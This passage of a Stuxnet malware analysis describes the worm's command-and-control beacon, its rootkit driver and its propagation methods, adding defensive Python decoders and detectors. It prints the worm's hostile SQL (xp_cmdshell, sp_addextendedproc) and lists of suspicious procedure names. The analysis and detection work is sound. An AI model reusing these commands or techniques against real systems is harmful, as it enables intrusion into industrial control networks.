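    0x62, 0x2E, 0x2D, 0x18, 0x95, 0xF0, 0xD8, 0xAD, 0x4B, 0x23, 0xBA, 0xDC, 0x4F, 0xD7, 0x0C])
STEP7_OR_WINCC_FLAG = 0x08   # assumption: "4th bit" of the flags byte at offset 0x11


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a cyclically repeated key (assumption: that is how the 31-byte keys are applied)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _cstring(buf: bytes, off: int) -> Tuple[str, int]:
    """Read a NUL-terminated ASCII string at off; return (string, offset past the NUL)."""
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("ascii", "replace"), end + 1


def parse_system_info(payload: bytes) -> Dict[str, Any]:
    """Parse the part 1 / part 2 system data after the XOR-0xFF layer has been removed."""
    _fixed, cfg14, os_major, os_minor, sp_major, part1_size = struct.unpack_from("<6B", payload, 0)
    seq_id, = struct.unpack_from("<I", payload, 0x08)
    _unknown, suite_mask = struct.unpack_from("<HH", payload, 0x0C)
    flags = payload[0x11]
    computer, off = _cstring(payload, 0x12)
    domain, _ = _cstring(payload, off)
    part2 = payload[part1_size:]          # part 2 starts where the size byte at 0x05 says part 1 ends
    ips = [socket.inet_ntoa(part2[i:i + 4]) for i in range(0, 12, 4) if part2[i:i + 4] != b"\0\0\0\0"]
    cfg9c, = struct.unpack_from("<I", part2, 0x0C)
    s7p = part2[0x11:].split(b"\x00", 1)[0].decode("ascii", "replace")
    return {
        "os_version": f"{os_major}.{os_minor} SP{sp_major}", "config_byte_14h": cfg14,
        "sequence_id": seq_id, "suite_mask": suite_mask, "config_dword_9ch": cfg9c,
        "has_step7_or_wincc": bool(flags & STEP7_OR_WINCC_FLAG),
        "computer_name": computer, "domain_name": domain, "ip_addresses": ips, "s7p_path": s7p,
    }


def parse_beacon(data_param: str) -> Dict[str, Any]:
    """Decode the hexified 'data=' query parameter of a captured beacon into host details."""
    packet = xor_repeating(bytes.fromhex(data_param), REQUEST_KEY)   # assumption: key covers whole packet
    fixed, = struct.unpack_from("<I", packet, 0)
    if fixed != 1:
        raise ValueError("not a Stuxnet beacon: fixed dword is %#x" % fixed)
    info = parse_system_info(xor_repeating(packet[0x1E:], b"\xff"))   # inner XOR-0xFF layer
    info["clsid"] = packet[0x04:0x14].hex()
    info["main_interface_ip"] = socket.inet_ntoa(packet[0x1A:0x1E])
    return info


def decode_response(body: bytes) -> Tuple[int, bytes]:
    """Strip the XOR layer from a server reply; return (command byte, payload module bytes)."""
    dec = xor_repeating(body, RESPONSE_KEY)
    size, = struct.unpack_from("<I", dec, 0)
    command, module = dec[4], dec[5:5 + size]
    if len(module) != size:
        raise ValueError("truncated response: expected %d module bytes, got %d" % (size, len(module)))
    return command, module


def constructed_beacon() -> str:
    """Build a constructed sample capture (not real traffic) so the decoder can be exercised offline."""
    part1 = bytearray(struct.pack("<6B", 1, 0x00, 5, 1, 3, 0))            # size byte patched below
    part1 += b"\x00\x00" + struct.pack("<I", 7) + struct.pack("<HH", 0, 0x0100)
    part1 += b"\x00" + bytes([STEP7_OR_WINCC_FLAG]) + b"WS-ENG01\x00" + b"PLANT\x00"
    part1[5] = len(part1)
    part2 = socket.inet_aton("10.0.0.5") + b"\0" * 8 + struct.pack("<I", 0) + b"\x00"
    part2 += b"c:\\a\\1.zip:\\proj.s7p\x00"
    packet = struct.pack("<I", 1) + b"\x00" * 16 + b"\x00" * 6 + socket.inet_aton("10.0.0.5")
    packet += xor_repeating(bytes(part1 + part2), b"\xff")
    return xor_repeating(packet, REQUEST_KEY).hex()

if __name__ == "__main__":
    print(parse_beacon(constructed_beacon()))
```

Two checks make the decoder safe to run over bulk proxy logs: the fixed dword must decode to 1 before anything else is trusted, and the part 1 size byte, not the string terminators, decides where part 2 begins, so a hostile or truncated value cannot push the parser past the buffer without raising.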

Figure 12

Command and Control

Windows Rootkit Functionality

Stuxnet has the ability to hide copies of its files copied to removable drives. This prevents users from noticing
that their removable drive is infected before sharing the removable drive to another party and also prevents
those users from realizing the recently inserted removable drive was the source of infection.

Stuxnet via Export 16 extracts Resource 201 as MrxNet.sys. The driver is registered as a service creating the
following registry entry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet\”ImagePath” = “%System%\drivers\mrxnet.sys”

The driver file is digitally signed with a legitimate Realtek digital certificate. The certificate was confirmed as
compromised and revoked on July 16, 2010 by Verisign.

The driver scans the following filesystem driver objects:
• \FileSystem\ntfs
• \FileSystem\fastfat
• \FileSystem\cdfs
A new device object is created by Stuxnet and attached to the device chain for each device object managed by these driver objects. The MrxNet.sys driver manages these new device objects. By inserting such objects, Stuxnet is able to intercept IRP requests (for example, reads and writes to NTFS, FAT or CD-ROM devices).

The driver also registers to a filesystem registration callback routine in order to hook newly created filesystem
objects on the fly.

The driver monitors “directory control” IRPs, in particular “directory query” notifications. Such IRPs are sent to the device when a user program is browsing a directory, for instance when it requests the list of files the directory contains.

Two types of files will be filtered out from a query directory result:
• Files with a “.LNK” extension having a size of 4,171 bytes.
• Files named “~WTR[FOUR NUMBERS].TMP”, whose size is between 4Kb and 8Mb and the sum of whose four numbers modulo 10 is zero (for example, 4+1+3+2=10=0 mod 10).
These filters hide the files used by Stuxnet to spread through removable drives, including:
• Copy of Copy of Copy of Copy of Shortcut to.lnk
• Copy of Copy of Copy of Shortcut to.lnk
• Copy of Copy of Shortcut to.lnk
• Copy of Shortcut to.lnk
• ~wtr4132.tmp
• ~wtr4141.tmp
In the driver file, the project path b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb was not removed.

Guavas are plants in the myrtle (myrtus) family. The string could have no significant meaning; however, a variety of interpretations have been discussed. Myrtus could be “MyRTUs”. RTU stands for remote terminal unit; RTUs are similar to PLCs and, in some environments, the term is used as a synonym for PLC. In addition, according to Wikipedia, “Esther was originally named Hadassah. Hadassah means ‘myrtle’ in Hebrew.” Esther learned of a plot to assassinate the king and “told the king of Haman’s plan to massacre all Jews in the Persian Empire...The Jews went on to kill only their would-be executioners.” Symantec cautions readers against drawing any attribution conclusions. Attackers would have the natural desire to implicate another party.


Stuxnet Propagation Methods


Stuxnet has the ability to propagate using a variety of methods. Stuxnet propagates by infecting removable drives and also by copying itself over the network using a variety of means, including two exploits. In addition, Stuxnet propagates by copying itself to Step 7 projects using a technique that causes Stuxnet to auto-execute when opening the project. The following sections describe the network, removable drive, and Step 7 project propagation routines.

Network propagation routines


Export 22 is responsible for the majority of the network propagation routines that Stuxnet uses. This export
builds a “Network Action” class that contains 5 subclasses. Each subclass is responsible for a different method
of infecting a remote host.

The functions of the 5 subclasses are:


• Peer-to-peer communication and updates
• Infecting WinCC machines via a hardcoded database server password
• Propagating through network shares
• Propagating through the MS10-061 Print Spooler Zero-Day Vulnerability
• Propagating through the MS08-067 Windows Server Service Vulnerability
Each of these classes is discussed in more detail below.

Peer-to-peer communication
The P2P component works by installing an RPC server and client. When the threat infects a computer it starts
the RPC server and listens for connections. Any other compromised computer on the network can connect to the
RPC server and ask what version of the threat is installed on the remote computer.

If the remote version is newer then the local computer will make a request for the new version and will update itself with that. If the remote version is older the local computer will prepare a copy of itself and send it to the remote computer so that it can update itself. In this way an update can be introduced to any compromised computer on a network and it will eventually spread to all other compromised computers.

All of the P2P requests take place over RPC as outlined below.

The RPC server offers the following routines. (Note that RPC methods 7, 8, 9 are not used by Stuxnet.)
• 0: Returns the version number of Stuxnet installed
• 1: Receive an .exe file and execute it (through injection)
• 2: Load module and execute export
• 3: Inject code into lsass.exe and run it
• 4: Builds the latest version of Stuxnet and sends to compromised computer
• 5: Create process
• 6: Read file
• 7: Drop file
• 8: Delete file
• 9: Write data records

Figure 13: Example of an old client requesting latest version of Stuxnet via P2P


The RPC client makes the following requests:

1. Call RPC function 0 to get remote version number.
2. Check if remote version number is newer than local version number.
3. If remote version number is newer then:
   1. Call RPC function 4 to request latest Stuxnet exe
   2. Receive the latest version of Stuxnet
   3. Install it locally (via process injection)
4. If the remote version number is older then:
   1. Prepare a standalone .exe file of the local Stuxnet version.
   2. Send the .exe file to the remote computer by calling RPC function 1.
When trying to connect to a remote RPC server this class uses the following logic.

It will attempt to call RPC function 0 on each of the following bindings in turn, if any RPC call succeeds then
Stuxnet proceeds with that binding:
1. ncacn_ip_tcp:IPADDR[135]
2. ncacn_np:IPADDR[\\pipe\\ntsvcs]
3. ncacn_np:IPADDR[\\pipe\\browser]
It will then try to impersonate the anonymous token and try the following binding:
4. ncacn_np:IPADDR[\\pipe\\browser]
It then reverts to its own token and finally tries to enumerate through the service control manager (SCM) looking
for any other bindings that may be available:
5. ncacn_ip_tcp:IPADDR (searches in the SCM for available services)
If any of the above bindings respond correctly to RPC function 0 then Stuxnet has found a remote compromised computer. RPC function 0 returns the version number of the remote Stuxnet infection. Based on this version number Stuxnet will either send a copy of itself to the remote computer or it will request a copy of the latest version from the remote computer and install it.

RPC function 1 is called in order to receive the latest version from the remote computer and RPC function 4 is
called to send the latest version of Stuxnet to the remote computer.

Of course Stuxnet does not simply execute the received executable. Instead, it injects it into a chosen process
and executes it that way as outlined in the Injection Technique section.

Furthermore, Stuxnet is actually a .dll file so in order to send an executable version of itself to the attacker Stuxnet must first build an executable version of itself. It does this by reading in a template .exe from resource 210 and populating it with all of the additional detail that is needed to make an executable version of the currently installed Stuxnet version, including the latest configuration data and information about the currently compromised computer.

Because the peer-to-peer mechanism occurs through RPC, it is unlikely to be an alternative method of command and control, as RPC is generally only effective within a local area network (LAN). The purpose of the peer-to-peer mechanism is likely to allow the attackers to reach computers that do not have outbound access to the general Internet, but can communicate with other computers on the LAN that have been infected and are able to contact the command and control servers.

Infecting WinCC computers


This class is responsible for connecting to a remote server running the WinCC database software. When it finds
a system running this software it connects to the database server using a password that is hardcoded within the
WinCC software. Once it has connected it performs two actions. First, Stuxnet sends malicious SQL code to the
database that allows a version of Stuxnet to be transferred to the computer running the WinCC software and
executes it, thereby infecting the computer that is running the WinCC database. Second, Stuxnet modifies an
existing view adding code that is executed each time the view is accessed.


After sending an SQL configuration query, Stuxnet sends an SQL statement that creates a table and inserts a binary value into the table. The binary value is a hex string representation of the main Stuxnet DLL as an executable file (formed using resource 210) and an updated configuration data block.

CREATE TABLE sysbinlog ( abin image )
INSERT INTO sysbinlog VALUES(0x…)

If successful, Stuxnet uses OLE Automation Stored Procedures to write itself from the database to disk as
%UserProfile%\sql[RANDOM VALUE].dbi.

The file is then added as a stored procedure and executed.

SET @ainf = @aind + '\\sql%05x.dbi'
EXEC sp_addextendedproc sp_dumpdbilog, @ainf
EXEC sp_dumpdbilog

The stored procedure is then deleted and the main DLL file is also deleted.

Once running locally on a computer with WinCC installed, Stuxnet will also save a .cab file derived from resource 203 on the computer as GracS\cc_tlg7.sav. The .cab file contains a bootstrap DLL meant to load the main Stuxnet DLL, located in GracS\cc_alg.sav. Next, Stuxnet modifies a view to reload itself. Stuxnet modifies the MCPVREADVARPERCON view to parse the syscomments.text field for additional SQL code to execute. The SQL code stored in syscomments.text is placed between the markers --CC-SP and --*.

In particular, Stuxnet will store and execute SQL code that will extract and execute Stuxnet from the saved CAB
file using xp_cmdshell.

set @t=left(@t,len(@t)-charindex('\\',reverse(@t)))+'\GraCS\cc_tlg7.sav';
set @s = 'master..xp_cmdshell ''extrac32 /y "'+@t+'" "'+@t+'x"''';
exec(@s);

Then, the extracted DLL will be added as a stored procedure, executed, and deleted. This allows Stuxnet to execute itself and ensure it remains resident.
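As an added example, not from the dossier, the following Python audits exported view definitions for the two artefacts this section describes: SQL hidden between the --CC-SP and --* markers, and references to xp_cmdshell, sp_addextendedproc, extrac32 or the sysbinlog table. The view text and names in the sample are constructed; `audit_views` is this example's own helper and expects the (name, definition) pairs to have been pulled from syscomments beforehand.

```python
# Added example (not from the dossier): audit SQL Server view definitions for
# the view-tampering technique described above. Input is a list of
# (view_name, definition_text) pairs exported from syscomments / sys.sql_modules.
import re

# Hidden SQL sits between these two markers inside the view's comment area.
MARKER_BLOCK = re.compile(r"--CC-SP(.*?)--\*", re.DOTALL)
# Procedure and object names quoted in the text; none belong in a WinCC view.
SUSPICIOUS = ("xp_cmdshell", "sp_addextendedproc", "extrac32", "sysbinlog")


def extract_hidden_sql(definition: str):
    """Return every block of SQL hidden between the two markers, stripped."""
    return [m.group(1).strip() for m in MARKER_BLOCK.finditer(definition)]


def suspicious_tokens(sql: str):
    """Return the suspicious names that occur in the text (case-insensitive)."""
    low = sql.lower()
    return [t for t in SUSPICIOUS if t in low]


def audit_views(views):
    """views: iterable of (name, definition). Returns one finding per view
    that either carries a hidden SQL block or references a suspicious name."""
    findings = []
    for name, definition in views:
        hidden = extract_hidden_sql(definition)
        tokens = suspicious_tokens(definition)
        if hidden or tokens:
            findings.append({
                "view": name,
                "hidden_blocks": len(hidden),
                "tokens": tokens,
            })
    return findings


# Constructed sample: a benign view and a tampered MCPVREADVARPERCON-style view
# whose comment area smuggles an extrac32 command through xp_cmdshell.
CLEAN_VIEW = "CREATE VIEW v_tags AS SELECT tag, val FROM tags"
TAMPERED_VIEW = (
    "CREATE VIEW MCPVREADVARPERCON AS SELECT * FROM vars\n"
    "/* --CC-SP\n"
    "set @s = 'master..xp_cmdshell ''extrac32 /y \"'+@t+'\" \"'+@t+'x\"''';\n"
    "exec(@s);\n"
    "--* */"
)

if __name__ == "__main__":
    for f in audit_views([("v_tags", CLEAN_VIEW), ("MCPVREADVARPERCON", TAMPERED_VIEW)]):
        print(f)
```

The marker scan is the specific indicator; the token scan is the generic one and will also catch the sysbinlog table and the sp_dumpdbilog-style extended procedure if a defender feeds it stored procedure text rather than views.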

Propagation through network shares


Stuxnet also can spread to available network shares through either a scheduled job or using Windows Management Instrumentation (WMI).

Stuxnet will enumerate all user accounts of the computer and the domain, and try all available network resources either using the user’s credential token or using WMI operations with the explorer.exe token in order to copy itself and execute on the remote share.

Stuxnet will determine if the ADMIN$ share is accessible to build the share name of the main drive (e.g.: C$). An executable is built using resource 210 and customized with the main DLL code and the latest configuration data block. After enumerating the directories of the network resource, the executable is copied as a random file name in the form DEFRAG[RANDLNT].tmp. Next, a network job is scheduled to execute the file two minutes after infection.

The same process occurs except using WMI with the explorer.exe token instead of using the user’s credential
token.

MS10-061 Print Spooler zero-day vulnerability


This is the zero day Print Spooler vulnerability patched by Microsoft in MS10-061. Although at first it was
thought that this was a privately found/disclosed vulnerability, it was later discovered that this vulnerability
was actually first released in the 2009-4 edition of the security magazine Hakin9 and had been public since that
time, but had not been seen to be used in the wild.


This vulnerability allows a file to be written to the %System% folder of vulnerable machines. The actual code to carry out the attack is stored in resource 222; this export loads the DLL stored in that resource and prepares the parameters needed to execute the attack, namely an IP address and a copy of the worm, and then calls export one from the loaded DLL. Using this information, Stuxnet is able to copy itself to remote computers as %System%\winsta.exe through the Printer Spooler, and then execute itself. Winsta.exe may contain multiple copies of Stuxnet and grow abnormally large.

Stuxnet will only attempt to use MS10-061 if the current date is before June 1, 2011.

MS08-067 Windows Server Service vulnerability


In addition, Stuxnet also exploits MS08-067, which is the same vulnerability utilized by W32.Downadup. MS08-067 can be exploited by connecting over SMB and sending a malformed path string that allows arbitrary execution. Stuxnet uses this vulnerability to copy itself to unpatched remote computers.

Stuxnet will verify the following conditions before exploiting MS08-067:


• The current date must be before January 1, 2030
• Antivirus definitions for a variety of antivirus products dated before January 1, 2009
• Kernel32.dll and Netapi32.dll timestamps after October 12, 2008 (before patch day)


Removable drive propagation


One of the main propagation methods Stuxnet uses is to copy itself to inserted removable drives. Industrial
control systems are commonly programmed by a Windows computer that is non-networked and operators often
exchange data with other computers using removable drives. Stuxnet used two methods to spread to and from
removable drives—one method using a vulnerability that allowed auto-execution when viewing the removable
drive and the other using an autorun.inf file.

LNK Vulnerability (CVE-2010-2568)


Stuxnet will copy itself and its supporting files to available removable drives any time a removable drive is inserted, and has the ability to do so if specifically instructed. The removable-drive copying is implemented by exports 1, 19, and 32. Export 19 must be called by other code and then it performs the copying routine immediately. Exports 1 and 32 both register routines to wait until a removable drive is inserted. The exports that cause replication to removable drives will also remove infections on the removable drives, depending on a configuration value stored in the configuration data block. Different circumstances will cause Stuxnet to remove the files from an infected removable drive. For example, once the removable drive has infected three computers, the files on the removable drive will be deleted.

If called from Export 1 or 32, Stuxnet will first verify it is running within services.exe, and determines which version of Windows it is running on. Next, it creates a new hidden window with the class name ‘AFX64c313’ that waits for a removable drive to be inserted (via the WM_DEVICECHANGE message), verifies it contains a logical volume (has a type of DBT_DEVTYP_VOLUME), and is a removable drive (has a drive type of DEVICE_REMOVABLE). Before infecting the drive, the current time must be before June 24, 2012.

Next, Stuxnet determines the drive letter of the newly inserted drive and reads in the configuration data to determine if it should remove itself from the removable drive or copy itself to the removable drive. When removing itself, it deletes the following files:
• %DriveLetter%\~WTR4132.tmp
• %DriveLetter%\~WTR4141.tmp
• %DriveLetter%\Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Copy of Copy of Shortcut to.lnk
If the removable drive should be infected, the drive is first checked to see if it is suitable, checking the following
conditions:
• The drive was not just infected, determined by the current time.
• The configuration flag to infect removable drives must be set, otherwise infections occur depending on the
date, but this is not set by default.
• The infection is less than 21 days old.
• The drive has at least 5MB of free space.
• The drive has at least 3 files.
If these conditions are met, the following files are created:
• %DriveLetter%\~WTR4132.tmp (~500Kb)
(This file contains Stuxnet’s main DLL in the stub section and is derived from Resource 210.)
• %DriveLetter%\~WTR4141.tmp (~25Kb)
(This file loads ~WTR4132.tmp and is built from Resource 241.)
• %DriveLetter%\Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Copy of Shortcut to.lnk
• %DriveLetter%\Copy of Copy of Copy of Copy of Shortcut to.lnk


The .lnk files are created using Resource 240 as a template and four are needed as each specifically targets one or more different versions of Windows including Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows 7. The .lnk files contain an exploit that will automatically execute ~WTR4141.tmp when simply viewing the folder.

~WTR4141.tmp then loads ~WTR4132.tmp, but before doing so, it attempts to hide the files on the removable drive. Hiding the files on the removable drive as early in the infection process as possible is important for the threat since the rootkit functionality is not installed yet, as described in the Windows Rootkit Functionality section. Thus, ~WTR4141.tmp implements its own less-robust technique in the meantime.

~WTR4141.tmp hooks the following APIs from kernel32.dll and Ntdll.dll:

From Kernel32.dll
• FindFirstFileW
• FindNextFileW
• FindFirstFileExW
From Ntdll.dll
• NtQueryDirectoryFile
• ZwQueryDirectoryFile
It replaces the original code for these functions with code that checks for files with the following properties:
• Files with an .lnk extension having a size of 4,171 bytes.
• Files named ~WTRxxxx.TMP, sized between 4Kb and 8 Mb, where xxxx is:
  • 4 decimal digits. (~wtr4132.tmp)
  • The sum of these digits modulo 10 is null. (Example: 4+1+3+2=10=0 mod 10)
If a request is made to list a file with the above properties, the response from these APIs is altered to state that the file does not exist, thereby hiding all files with these properties.
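The two rules above (and the equivalent MrxNet.sys filters in the Windows Rootkit Functionality section) can be inverted into a detection check: anything the rootkit would hide is an indicator worth flagging. The following Python is an added example, not part of the dossier; it runs the rules over a directory listing taken from a non-infected host (for example a removable drive mounted on a clean analysis system), and the sample listing it uses is constructed. `matches_rootkit_filter`, `scan_listing` and `scan_directory` are this example's own names.

```python
# Added example (not from the dossier): flag files that the Stuxnet user-mode
# hooks and the MrxNet.sys driver would hide. Run it from a clean host against
# a mounted volume, or feed it a (name, size) listing from a forensic image.
import os
import re

LNK_SIZE = 4171                               # exact size of the exploit .lnk files
TMP_MIN, TMP_MAX = 4 * 1024, 8 * 1024 * 1024  # 4 KB .. 8 MB
WTR_PATTERN = re.compile(r"^~WTR(\d{4})\.TMP$", re.IGNORECASE)


def digit_sum_mod(digits: str, modulus: int, base: int = 10) -> int:
    """Sum of the digits of `digits` (interpreted in `base`) modulo `modulus`."""
    return sum(int(ch, base) for ch in digits) % modulus


def matches_rootkit_filter(name: str, size: int) -> bool:
    """True if a file with this name and size would be hidden by the filters
    described above, i.e. it is a Stuxnet removable-drive indicator."""
    if name.lower().endswith(".lnk") and size == LNK_SIZE:
        return True
    m = WTR_PATTERN.match(name)
    if m and TMP_MIN <= size <= TMP_MAX and digit_sum_mod(m.group(1), 10) == 0:
        return True
    return False


def scan_listing(entries):
    """entries: iterable of (name, size) pairs; returns the suspicious names."""
    return [name for name, size in entries if matches_rootkit_filter(name, size)]


def scan_directory(path: str):
    """Walk a real mounted volume and return the paths that match."""
    hits = []
    for root, _dirs, files in os.walk(path):
        for f in files:
            full = os.path.join(root, f)
            try:
                size = os.path.getsize(full)
            except OSError:
                continue
            if matches_rootkit_filter(f, size):
                hits.append(full)
    return hits


# Constructed listing: dossier filenames plus decoys that must not match.
SAMPLE_LISTING = [
    ("Copy of Shortcut to.lnk", 4171),
    ("Copy of Copy of Shortcut to.lnk", 4171),
    ("~WTR4132.tmp", 500 * 1024),   # 4+1+3+2 = 10 -> hidden
    ("~WTR4141.tmp", 25 * 1024),    # 4+1+4+1 = 10 -> hidden
    ("~WTR1234.tmp", 10 * 1024),    # 1+2+3+4 = 10 -> also hidden
    ("~WTR1235.tmp", 10 * 1024),    # 11 mod 10 != 0 -> visible
    ("~WTR5500.tmp", 2 * 1024),     # digit rule holds but below 4 KB -> visible
    ("report.lnk", 1200),           # wrong size -> visible
]

if __name__ == "__main__":
    print(scan_listing(SAMPLE_LISTING))
```

The listing must come from a system where the hooks are not active: on an infected host the very APIs `os.walk` relies on are the ones being lied to, which is why the check belongs on a clean analysis workstation or on an offline image.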

After the DLL APIs are hooked, ~WTR4132.tmp is loaded. To load a .dll file normally, a program calls the “LoadLibrary” API with the file name of the .dll file to be loaded into memory. W32.Stuxnet uses a different approach, not just in the first .dll file but in several different parts of the code. This method is described in the Bypassing Behavior Blocking When Loading DLLs section.

~WTR4132.tmp contains the main Stuxnet DLL in the .stub section. This is extracted into memory and then Export 15 of the DLL is called executing the installation of Stuxnet. Export 15 is described in the Installation section.

Figure 14 describes the execution flow.

Figure 14: USB Execution Flow


AutoRun.Inf
Previous versions of Stuxnet did not use the LNK 0-day exploit, but instead spread via an autorun.inf file. Resource 207 is a 500kb file that was only present in the older version of Stuxnet, and was removed in the new version.

An autorun.inf file is a configuration file placed on removable drives that instructs Windows to automatically execute a file on the removable drive when the drive is inserted. Typically, one would place the autorun.inf file and executable in the root directory of the drive. However, Stuxnet uses a single file. Resource 207 is an executable file and also contains a correctly formatted autorun.inf data section at the end.

When autorun.inf files are parsed by the Windows OS, the parsing is quite forgiving, meaning that any characters that are not understood as legitimate autorun commands are skipped. Stuxnet uses this to its advantage by placing the MZ file first inside the autorun.inf file. During parsing of the autorun.inf file all of the MZ file will be ignored until the legitimate autorun commands that are appended at the end of the file are encountered. See the header and footer of the autorun.inf file as shown in the following diagrams.
Figure 15: Autorun.inf header

Figure 16: Autorun.inf footer

When we show only the strings from the footer we can see that they are composed of legitimate autorun commands:

Figure 17: Hidden autorun commands

Notice that Stuxnet uses the autorun commands to specify the file to execute as the actual autorun.inf file. Using this trick, the autorun.inf file will be treated as a legitimate autorun.inf file first and later as a legitimate executable file.


In addition to this, Stuxnet also uses another trick to enhance the chances that it will be executed. The autorun commands turn off autoplay and then add a new command to the context menu. The command that is added is found in %Windir%\System32\shell32.dll,-8496. This is actually the “Open” string. Now when viewing the context menu for the removable device the user will actually see two “Open” commands.

One of these Open commands is the legitimate one and one is the command added by Stuxnet. If a user chooses to open the drive via this menu, Stuxnet will execute first. Stuxnet then opens the drive to hide that anything suspicious has occurred.

Figure 18: Two “Open” commands
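The following Python is an added example (not from the dossier) of a lenient autorun.inf reader that behaves the way the text describes Windows behaving: it discards everything that is not a recognizable directive and then reports whether the file starts with an MZ header, disables autoplay, names itself as the file to run, or adds an “Open” verb that reuses the shell32.dll,-8496 string. The sample bytes are constructed for the example; the directive names (open, shellexecute, shell\<verb>\command, UseAutoPlay) are standard autorun.inf keys, and the exact layout of Stuxnet's own footer is not reproduced. `parse_autorun` and `assess_autorun` are this example's own helpers.

```python
# Added example (not from the dossier): a forgiving autorun.inf parser and a
# triage function for the "executable with an autorun footer" trick.
import re

# key = value, where the key may contain backslashes (shell\open\command).
KEY_VALUE = re.compile(rb"^\s*([A-Za-z0-9_\\]+)\s*=\s*(.*?)\s*$")


def parse_autorun(data: bytes) -> dict:
    """Return the key=value directives under [autorun], ignoring everything
    that is not a well-formed line (binary junk, stray bytes, other sections).
    Keys are lower-cased; values are kept as written."""
    directives, in_section = {}, False
    for raw in data.split(b"\n"):
        line = raw.strip(b"\r\x00 \t")
        if line.lower() == b"[autorun]":
            in_section = True
            continue
        if line.startswith(b"[") and line.endswith(b"]"):
            in_section = False          # some other section, e.g. [DeviceInstall]
            continue
        if not in_section:
            continue                    # this is where the MZ bytes get skipped
        m = KEY_VALUE.match(line)
        if m:
            key = m.group(1).decode("ascii", "replace").lower()
            directives[key] = m.group(2).decode("ascii", "replace")
    return directives


def assess_autorun(data: bytes) -> dict:
    """Summarise the indicators described in the text for one autorun.inf."""
    d = parse_autorun(data)
    # Directives that name a file to run: open, shellexecute, shell\<verb>\command.
    targets = [v.lower() for k, v in d.items()
               if k in ("open", "shellexecute") or k.endswith("\\command")]
    return {
        "starts_with_mz": data[:2] == b"MZ",
        "runs_itself": any(t.strip('"').endswith("autorun.inf") for t in targets),
        "autoplay_disabled": d.get("useautoplay") == "0",
        "fake_open_verb": any("shell32.dll,-8496" in v.lower() for v in d.values()),
        "directives": d,
    }


# Constructed sample: a fake PE header, 256 bytes of binary noise, then trailing
# directives in the shape the text describes (not Stuxnet's literal footer).
SAMPLE = (
    b"MZ\x90\x00" + bytes(range(256)) + b"\n[autorun]\r\n"
    b"open=autorun.inf\r\n"
    b"shellexecute=autorun.inf\r\n"
    b"UseAutoPlay=0\r\n"
    b"shell\\open=@%windir%\\system32\\shell32.dll,-8496\r\n"
    b"shell\\open\\command=autorun.inf\r\n"
)
# Constructed benign file for comparison.
CLEAN_SAMPLE = b"[autorun]\r\nopen=setup.exe\r\nicon=setup.exe,0\r\n"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE), ("clean", CLEAN_SAMPLE)):
        r = assess_autorun(blob)
        print(name, {k: v for k, v in r.items() if k != "directives"})
```

Any one of the four flags is worth a look on its own; all four together are the pattern this section describes. A file that is a valid PE image and also parses as autorun.inf should never occur on a legitimately prepared drive.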


Step 7 Project File Infections


The main export, Export 16, calls Export 2, which is used to hook specific APIs that are used to open project files
inside the s7tgtopx.exe process. This process is the WinCC Simatic manager, used to manage a WinCC/Step7
project.

The Import Address Tables of the following DLLs are modified:


• In s7apromx.dll, mfc42.dll, and msvcrt.dll, CreateFileA is replaced to point to “CreateFileA_hook”.
• In ccprojectmgr.exe, StgOpenStorage is replaced to point to “StgOpenStorage_hook”.
CreateFileA is typically used to open *.S7P projects (Step7 project files). Instead, the CreateFileA_hook routine
will be called. If the file opened has the extension .s7p, CreateFileA_hook will call RPC function #9, which is
responsible for recording this path to the encrypted datafile %Windir%\inf\oem6c.pnf, and eventually infect the
project folder inside which the s7p file is located.

StgOpenStorage is used by the Simatic manager to open *.MCP files. These files are found inside Step7 projects. Like CreateFileA_hook, StgOpenStorage_hook will monitor files with the *.mcp extension. If such a file is accessed by the manager, the hook function will call RPC function #9 to record the path to oem6c.pnf and eventually infect the project folder inside which the mcp file is located.

Export 14 is the main routine for infecting Step 7 project files.

The project infector routine takes a path to a project as input, and can infect it causing Stuxnet to execute when
the project is loaded. The project path may be a regular path to a directory, or a path to zip file containing the
project.

Files inside the projects are listed. Those with extensions .tmp, .s7p or .mcp receive special processing.

S7P files
Files with such extensions are Step7 project files. When such a file is found inside a project folder, the project
may be infected.

The project is a candidate for infection if:
• It is not deemed too old (used or accessed in the last 3.5 years).
• It contains a “wincproj” folder with a valid MCP file.
• It is not a Step7 example project, checked by excluding paths matching “*\Step7\Examples\*”.
The infection process then consists of several distinct steps:
1. Stuxnet creates the following files:
   • xutils\listen\xr000000.mdx (an encrypted copy of the main Stuxnet DLL)
   • xutils\links\s7p00001.dbf (a copy of a Stuxnet data file, 90 bytes in length)
   • xutils\listen\s7000001.mdx (an encoded, updated version of the Stuxnet configuration data block)
2. The threat scans subfolders under the “hOmSave7” folder. In each of them, Stuxnet drops a copy of a DLL it carries within its resources (resource 202). This DLL is dropped using a specific file name. The file name is not disclosed here in the interests of responsible disclosure and will be referred to as xyz.dll.
3. Stuxnet modifies a Step7 data file located in Apilog\types.
When an infected project is opened with the Simatic manager the modified data file will trigger a search for the previously mentioned xyz.dll file. The following folders are searched in the following order:
• The S7BIN folder of the Step7 installation folder
• The %System% folder
• The %Windir%\system folder
• The %Windir% folder
• Subfolders of the project’s hOmSave7 folder


If the xyz.dll file is not found in one of the first four locations listed above, the malicious DLL will be loaded and
executed by the manager. This .dll file acts as a decryptor and loader for the copy of the main DLL located in
xutils\listen\xr000000.mdx. This strategy is very similar to the DLL Preloading Attacks that emerged in August.

Versions 5.3 and 5.4 SP4 of the manager are impacted. We are unsure whether the latest versions of the man-
ager (v5.4 SP5, v5.5, released in August this year) are affected.

MCP files
Like .s7p files, .mcp files may be found inside a Step7 project folder. However, they are normally created by WinCC. Finding such a file inside the project may trigger project infection as well as the WinCC database infection.

The project is a candidate for infection if:
• It is not deemed too old (used or accessed in the last 3.5 years).
• It contains a GracS folder with at least one .pdl file in it.
The infection process then consists of several distinct steps:
1. Stuxnet creates the following files:
   • GracS\cc_alg.sav (an encrypted copy of the main Stuxnet DLL)
   • GracS\db_log.sav (a copy of a Stuxnet data file, which is 90 bytes in length)
